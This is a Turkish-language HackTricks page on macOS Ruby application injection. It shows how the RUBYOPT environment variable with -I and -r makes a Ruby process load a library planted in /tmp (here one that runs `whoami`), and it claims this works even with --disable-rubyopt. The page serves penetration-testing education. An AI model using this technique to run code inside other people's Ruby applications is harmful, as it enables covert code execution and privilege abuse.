macOS Ruby Applications Injection

AWS hacklemeyi sıfırdan kahraman olmak için htARTE (HackTricks AWS Kırmızı Takım Uzmanı) öğrenin!

HackTricks'i desteklemenin diğer yolları:

Şirketinizi HackTricks'te reklamını görmek veya HackTricks'i PDF olarak indirmek için ABONELİK PLANLARINI kontrol edin!
Resmi PEASS & HackTricks ürünlerini edinin
The PEASS Ailesi'ni keşfedin, özel NFT'lerimiz koleksiyonumuz
💬 Discord grubuna veya telegram grubuna katılın veya Twitter 🐦 @carlospolopm'ı takip edin.
Hacking hilelerinizi HackTricks ve HackTricks Cloud github reposuna PR göndererek paylaşın.

RUBYOPT

Bu çevre değişkeni kullanılarak ruby her çalıştırıldığında yeni parametreler eklemek mümkündür. -e parametresi ruby kodunu belirtmek için kullanılamasa da, -I ve -r parametreleri kullanılarak yüklenme yoluna yeni bir klasör eklemek ve ardından yüklenmesi gereken bir kütüphane belirtmek mümkündür.

/tmp dizininde inject.rb adında bir kütüphane oluşturun:

inject.rb

puts `whoami`

Herhangi bir yerde aşağıdaki gibi bir ruby betiği oluşturun:

hello.rb

puts 'Hello, World!'

Ardından, keyfi bir ruby betiği oluşturun ve aşağıdaki komutla yükleyin:

RUBYOPT="-I/tmp -rinject" ruby hello.rb

Eğlenceli bir gerçek, parametre --disable-rubyopt ile bile çalışır:

RUBYOPT="-I/tmp -rinject" ruby hello.rb --disable-rubyopt

AWS hackleme becerilerini sıfırdan kahraman seviyesine öğrenin htARTE (HackTricks AWS Kırmızı Takım Uzmanı)!

HackTricks'ı desteklemenin diğer yolları:

Şirketinizi HackTricks'te reklamını görmek isterseniz veya HackTricks'i PDF olarak indirmek isterseniz ABONELİK PLANLARINA göz atın!
Resmi PEASS & HackTricks ürünlerini edinin
PEASS Ailesi'ni keşfedin, özel NFT'lerimizden oluşan koleksiyonumuz
💬 Discord grubuna veya telegram grubuna katılın veya Twitter 🐦 @carlospolopm'ı takip edin.
Hacking hilelerinizi HackTricks ve HackTricks Cloud github depolarına PR göndererek paylaşın.

PreviousmacOS Python Applications Injection NextmacOS .Net Applications Injection

Last updated 2 months ago